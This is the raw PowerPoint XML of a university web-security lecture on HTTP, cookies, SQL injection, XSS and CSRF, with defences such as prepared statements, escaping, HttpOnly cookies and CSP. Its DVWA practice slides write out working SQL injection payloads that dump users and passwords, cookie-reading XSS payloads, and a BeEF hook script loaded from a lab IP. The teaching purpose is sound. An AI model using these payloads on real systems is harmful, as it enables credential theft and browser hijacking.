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9" r:id="rId3"/>
    <p:sldId id="291" r:id="rId4"/>
    <p:sldId id="292" r:id="rId5"/>
    <p:sldId id="325" r:id="rId6"/>
    <p:sldId id="326" r:id="rId7"/>
    <p:sldId id="328" r:id="rId8"/>
    <p:sldId id="293" r:id="rId9"/>
    <p:sldId id="290" r:id="rId10"/>
    <p:sldId id="294" r:id="rId11"/>
    <p:sldId id="261" r:id="rId12"/>
    <p:sldId id="295" r:id="rId13"/>
    <p:sldId id="334" r:id="rId14"/>
    <p:sldId id="327" r:id="rId15"/>
    <p:sldId id="298" r:id="rId16"/>
    <p:sldId id="299" r:id="rId17"/>
    <p:sldId id="301" r:id="rId18"/>
    <p:sldId id="330" r:id="rId19"/>
    <p:sldId id="331" r:id="rId20"/>
    <p:sldId id="332" r:id="rId21"/>
    <p:sldId id="302" r:id="rId22"/>
    <p:sldId id="303" r:id="rId23"/>
    <p:sldId id="306" r:id="rId24"/>
    <p:sldId id="333" r:id="rId25"/>
    <p:sldId id="304" r:id="rId26"/>
    <p:sldId id="305" r:id="rId27"/>
    <p:sldId id="307" r:id="rId28"/>
    <p:sldId id="308" r:id="rId29"/>
    <p:sldId id="31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5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5" autoAdjust="0"/>
    <p:restoredTop sz="92130" autoAdjust="0"/>
  </p:normalViewPr>
  <p:slideViewPr>
    <p:cSldViewPr>
      <p:cViewPr>
        <p:scale>
          <a:sx n="112" d="100"/>
          <a:sy n="112" d="100"/>
        </p:scale>
        <p:origin x="2720" y="7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B510-4F51-4034-9D60-72D2824B6A1E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3B6B8-7CF2-4C1B-9F4E-AE398E53F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Nc</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> –v </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>www.k-state.edu</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> 80</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>Get / HTTP/1.0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3B6B8-7CF2-4C1B-9F4E-AE398E53FE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2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3B6B8-7CF2-4C1B-9F4E-AE398E53FE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3B6B8-7CF2-4C1B-9F4E-AE398E53FE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Vulnerabilities involve cookie:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Network eavesdropping</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	DNS cache poisoning</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	Cross-site scripting – cookie theft</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>	CSRF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HTTP_cookie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3B6B8-7CF2-4C1B-9F4E-AE398E53FE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30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3B6B8-7CF2-4C1B-9F4E-AE398E53FE2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7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Metaspolit</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> lesson</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t>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3B6B8-7CF2-4C1B-9F4E-AE398E53FE2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6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 anti-cross site scripting </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>library</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>NOScript</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> extension </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" err="1" smtClean="0"/>
              <a:t>firefox</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" baseline="0" smtClean="0"/>
              <a:t>Chrome XSS filter</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP java</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> encoder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3B6B8-7CF2-4C1B-9F4E-AE398E53FE2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52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3B6B8-7CF2-4C1B-9F4E-AE398E53FE2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71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Secret cookie?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>POST</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" baseline="0" dirty="0" smtClean="0"/>
              <a:t> requests only?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3B6B8-7CF2-4C1B-9F4E-AE398E53FE2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7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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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8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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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7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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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7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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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7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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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0B2C-9151-4B9F-98E4-9DB84E734355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18-02B6-4FE9-BA64-74DA69C8B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7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70B2C-9151-4B9F-98E4-9DB84E734355}" type="datetimeFigureOut">
              <a:rPr lang="en-US" smtClean="0"/>
              <a:pPr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B6718-02B6-4FE9-BA64-74DA69C8B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1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0/ui/pane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Vulnerabilities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990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Xiaolong</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t> (Daniel) Wang</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" sz="2400" dirty="0" smtClean="0"/>
              <a:t>Xinming (Simon) Ou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87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and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Commonly a website has a </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0" smtClean="0"/>
              <a:t>database </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="3200" dirty="0"/>
              <a:t>backend</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Common Database Software:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>MSSQL, MySQL, </a:t>
            </a:r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smtClean="0"/>
              <a:t>Structured Query Language is a domain specific language designed for database queries</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-06-13 at 9.57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470400"/>
            <a:ext cx="42672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3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Web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algn="just">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>SQL Injection</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just">
              <a:spcAft>
                <a:spcPts val="1200"/>
              </a:spcAft>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>M</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>alicious input infiltrates to DB server through </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>SQL </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>queries</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>XSS – Cross-site scripting</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts from one domain gets run in another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CSRF – Cross-site request forgery</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1" algn="just"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious web site forces a victim to execute unwanted actions on another web site which it is already authenticated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6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</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>OWASP (Open Web Application Security Project) </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>top 10 most dangerous web vulnerabilities</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Special SQL keywords are inserted into entry field(s), that change the structure/semantics of the resulting SQL query to the backend database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481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Practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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Test SQL injection attacks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Set security level to “low”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Select SQL injection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Try the following input in the text box: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lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>or 0 = </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>'0</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, version() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, user() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, database() </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> from </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>information_schema.tables</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> where </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>table_name</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t> like 'user%' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>#</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" smtClean="0"/>
              <a:t>' </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>and 0 = 0 union select null, </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0" err="1"/>
              <a:t>concat</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2300" dirty="0"/>
              <a:t>(first_name,0x0a,last_name,0x0a,user,0x0a,password) from users #</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="73848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obby-tabl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09600"/>
            <a:ext cx="5015794" cy="58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4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Prepared statements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Input sanitization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escaping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Restrict database user permissions</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="5" name="Picture 4" descr="Screen Shot 2014-06-16 at 2.3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057400"/>
            <a:ext cx="7039947" cy="685800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="6" name="Picture 5" descr="Screen Shot 2014-06-16 at 2.43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114800"/>
            <a:ext cx="8244120" cy="116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62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 (XSS)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code injection attack that loads malicious scripts from one site to run with the privilege of another</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Usually uses JavaScript</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Causes</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Web server </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>blindly </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>takes content from untrusted sources to render to the client (browser)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>Browser </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>has </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>no way to differentiate legitimate content and malicious one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700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Reflected XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious scripts sent from victim’s request</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically delivered to victim via another route, such as email message or malicious links on another website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Stored XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Malicious scripts get into the website’s data store, and delivered to other visitors of the site</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Typically happens at forums, bulletin boards, social network websites, etc. where users are allowed to post content on the website</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>DOM-based XSS</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Scripts manipulate web page’s Document Object Model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Vulnerability is in the client-side code rather than the server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00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Reflected XSS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5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01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XSS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1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6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061" r="-19061"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="5638800" y="4480539"/>
            <a:ext cx="3851275" cy="21181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8166" y="27494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Hypertext Transfer Protocol: </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>is a application protocol</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>request-response protocol in the client-server computing model</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTTP resources are identified by Uniform Resource Locators (URLs)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7" name="Picture 6" descr="1024px-Interne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953000"/>
            <a:ext cx="1757779" cy="1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7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DOM-based XSS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8063415" cy="51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60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Practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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Reflected XSS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Set security level to “low”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Select XSS reflected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Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(“hi”)&lt;/script&gt;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Input: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>script&gt;alert</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>)</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;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dirty="0" smtClean="0"/>
              <a:t>What do you see on the browser?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01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Practice </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1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Stored XSS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 DVWA Security to “low”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Select XSS Stored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Give it a name and type in message box:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&lt;script&gt;alert(“XSS Test”)&lt;/script&gt;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Try:</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>="http://</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>www.cnn.com</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>"&gt;&lt;/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>iframe</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt; or</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="857250" lvl="2" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>&lt;script&gt;alert(</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1"/>
              <a:t>document.cookie</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0"/>
              <a:t>)&lt;/script</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&gt;</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="457200" lvl="1" indent="0">
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>What if someone can create a malicious </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>php</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> file or </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1" smtClean="0"/>
              <a:t>js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>?</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr marL="85725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95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Practice 4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BeEF</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> XSS Framework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Open terminal, type</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>:</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> cd </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>usr</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>/share/beef-</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>xss</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" i="1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i="1" dirty="0" smtClean="0"/>
              <a:t>./beef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Open browser, type </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0">
                <a:hlinkClick r:id="rId2"/>
              </a:rPr>
              <a:t>http://localhost:3000/ui/panel</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> and login with </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>beef:beef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Open DVWA, login and set security level to low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Select XSS Stored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Type: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>&lt;script </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>src</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>=“http</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>://172.17.22.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i="1" dirty="0" smtClean="0"/>
              <a:t>:3000/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" err="1" smtClean="0"/>
              <a:t>hook.js</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" i="1" dirty="0" smtClean="0"/>
              <a:t>”&gt;&lt;/script&gt;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Launch attack!</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="3079948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Untrusted input is taken and rendered by the website/browser</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>In order to prevent this type of code injection, secure input handling is needed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Encoding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26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Whitelist model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enies anything that is not allowed</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Treats html document like a parameterized database query ()</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t> Escape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>HTML escape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Attribute escape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>JavaScript escape</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>Use </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" smtClean="0"/>
              <a:t>HTTP-Only </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>cookie flag</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Prevents java script from reading cookies</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Implement Content Security Policy</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>Browser side mechanism for source whitelist for resource</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr lvl="1"/>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>e.g., CSP add in HTTP header</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
    </p:spTree>
    <p:extLst>
      <p:ext uri="{BB962C8B-B14F-4D97-AF65-F5344CB8AC3E}">
        <p14:creationId xmlns:p14="http://schemas.microsoft.com/office/powerpoint/2010/main" val="2787553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attack that forces a victim to execute unwanted action on a web application in which he/she is currently authenticated</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:endParaRPr lang="en-US" dirty="0" smtClean="0"/>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="en-US" dirty="0" smtClean="0"/>
              <a:t>CSRF exploits the trust in the victim’s browser</a:t>
